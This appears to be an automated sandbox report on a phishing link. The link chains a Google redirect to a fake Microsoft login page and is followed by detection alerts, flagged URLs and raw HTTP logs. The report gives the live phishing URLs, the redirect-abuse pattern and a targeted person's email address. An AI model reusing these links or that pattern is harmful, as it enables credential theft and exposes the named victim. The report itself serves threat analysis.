Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSE

Overview

General Information

Sample URL:https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80
Analysis ID:1568921
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish54
AI detected suspicious Javascript
Detected hidden input values containing email addresses (often used in phishing pages)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,5425962361269562764,13963646821391754707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0 $$$ &c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
1.10.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    1.3.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      2.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        3.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          3.6.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T08:23:50.183276+010028570901Successful Credential Theft Detected164.92.191.86443192.168.2.549790TCP
            2024-12-05T08:23:51.770761+010028570901Successful Credential Theft Detected164.92.191.86443192.168.2.549789TCP
            2024-12-05T08:23:54.711370+010028570901Successful Credential Theft Detected164.92.191.86443192.168.2.549801TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://8cacc656-3c4125ca.gharelokhana.com/sbo.co.at/winauth/ssoprobe?client-request-id=a1e188a0-68bf-4354-b37c-5c94feca2ce3&_=1733383463857Avira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gifAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gifAvira URL Cloud: Label: malware
            Source: https://b1a4e5aa-3c4125ca.gharelokhana.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0Avira URL Cloud: Label: malware
            Source: https://djdjkdlellekkff.gharelokhana.com/4.5.1/npm-monitoringAvira URL Cloud: Label: malware
            Source: https://djdjkdlellekkff.gharelokhana.com/common/instrumentation/dssostatusAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icoAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.jsAvira URL Cloud: Label: malware
            Source: https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SECAvira URL Cloud: Label: malware
            Source: https://707242bf-3c4125ca.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.jsAvira URL Cloud: Label: malware
            Source: https://l1ve.gharelokhana.com/Me.htm?v=3Avira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.jsAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.jsAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.jsAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgAvira URL Cloud: Label: malware
            Source: https://djdjkdlellekkff.gharelokhana.com/favicon.icoAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.jsAvira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.cssAvira URL Cloud: Label: malware
            Source: https://djdjkdlellekkff.gharelokhana.com/3c4125ca1ce249aea8b425e8555a32e2/Avira URL Cloud: Label: malware
            Source: https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jsAvira URL Cloud: Label: malware
            Source: https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspxAvira URL Cloud: Label: malware

            Phishing

            barindex
            AI detected phishing page
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'djdjkdlellekkff.gharelokhana.com' does not match the legitimate domain for Microsoft., The domain 'gharelokhana.com' does not have any known association with Microsoft., The subdomain 'djdjkdlellekkff' appears random and suspicious, which is a common tactic in phishing URLs., The email domain 'sbo.co.at' does not provide any context or association with Microsoft, adding to the suspicion. DOM: 3.9.pages.csv
            Yara detected HtmlPhish54
            Source: Yara matchFile source: 1.10.id.script.csv, type: HTML
            Source: Yara matchFile source: 1.3.id.script.csv, type: HTML
            Source: Yara matchFile source: 2.2.pages.csv, type: HTML
            Source: Yara matchFile source: 3.3.pages.csv, type: HTML
            Source: Yara matchFile source: 3.6.pages.csv, type: HTML
            Source: Yara matchFile source: 3.4.pages.csv, type: HTML
            Source: Yara matchFile source: 3.9.pages.csv, type: HTML
            Source: Yara matchFile source: 3.8.pages.csv, type: HTML
            AI detected suspicious Javascript
            Source: 1.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... High-risk indicators present: Script uses suspicious domains (gharelokhana.com) masquerading as Microsoft login, contains obfuscated/encoded content, and appears to be a sophisticated phishing attempt targeting Microsoft credentials. Multiple suspicious endpoints for data collection and potential credential harvesting.
            Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... Script shows multiple high-risk indicators: heavy obfuscation (encoded strings and variable names), suspicious DOM manipulation patterns (multiple ad-related selectors), and potential data collection behaviors. The code appears to be deliberately obscured and contains references to tracking and advertising elements.
            Source: 1.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... High-risk script showing multiple red flags: 1) Uses suspicious domains (gharelokhana.com) masquerading as legitimate Microsoft login flow, 2) Contains OAuth authorization endpoints pointing to potentially malicious domains, 3) Shows signs of a sophisticated phishing attack targeting Microsoft/Azure credentials with carefully crafted authorization parameters and redirect URIs.
            Source: 1.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhd... This code shows multiple high-risk indicators: heavy obfuscation (encoded strings, numeric hex values), complex control flow obfuscation (nested functions, while loops with shift operations), and potential dynamic code execution patterns. The code structure is characteristic of malware that attempts to hide its true functionality.
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: klaus.mader@sbo.co.at
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AHTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 88px; height: 31px; overflow: hidden; position: relative;"]
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: Iframe src: https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspx
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No favicon
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=trueHTTP Parser: No <meta name="copyright".. found

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.92.191.86:443 -> 192.168.2.5:49790
            Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.92.191.86:443 -> 192.168.2.5:49801
            Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.92.191.86:443 -> 192.168.2.5:49789
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.dz to https://alvoradavisual.com.br/yoya/cjbh/a2xhdxmubwfkzxjac2jvlmnvlmf0$$$
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 HTTP/1.1Host: google.dzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 HTTP/1.1Host: www.google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: www.google.dzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=lp3uNzDSgibs_FNtydKoUoejVwdQ25A9425oEpPvEfPWMtciM4D-ST1PxZ56f216U_ZvgZG2vjDZy6fVTY2vT86_7QvcdpgI1ytRwD7qYJ-k8kZOsVHvwbKKCsoh5OwoCicBsRcspAr1-5d6U0bQzbZe4ATRPwedOUGtJoq0idIsuni5WiAB7NaUuuvUd6uEDwrQ
            Source: global trafficHTTP traffic detected: GET /yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: alvoradavisual.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: alvoradavisual.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
